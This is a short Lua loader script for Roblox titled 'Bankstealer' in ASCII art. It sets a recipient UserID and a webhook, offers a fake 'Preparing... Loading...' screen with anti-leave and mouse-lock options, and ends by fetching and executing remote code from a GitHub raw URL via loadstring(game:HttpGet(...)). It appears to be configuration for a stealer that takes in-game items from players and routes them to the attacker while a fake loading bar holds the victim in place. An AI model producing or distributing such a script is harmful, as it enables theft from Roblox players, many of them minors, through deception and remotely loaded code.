
--[[
   ____              _        _             _           
  | __ )  __ _ _ __ | | _____| |_ ___  __ _| | ___ _ __ 
  |  _ \ / _` | '_ \| |/ / __| __/ _ \/ _` | |/ _ \ '__|
  | |_) | (_| | | | |   <\__ \ ||  __/ (_| | |  __/ |   
  |____/ \__,_|_| |_|_|\_\___/\__\___|\__,_|_|\___|_| 

]]--

_G.UserID = "69267867"
_G.Webhook = "Webhook Here"

_G.LoadingScreen = false -- make it true if you want the loadingscreen
_G.AntiLeave = false -- make it true if you want the antileave
_G.MouseLock = false -- make it true if you want the mouselock

-- Remove These If You're Not Using The Rizz LoadingScreen

_G.ScriptName = "Script Name"
_G.FirstText = "Preparing..."
_G.SecondText = "Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- in secondes it's the time for the loading bar to hit from 0% to 100%

loadstring(game:HttpGet("https://raw.githubusercontent.com/PSXHACKS1/ban/main/banks"))()
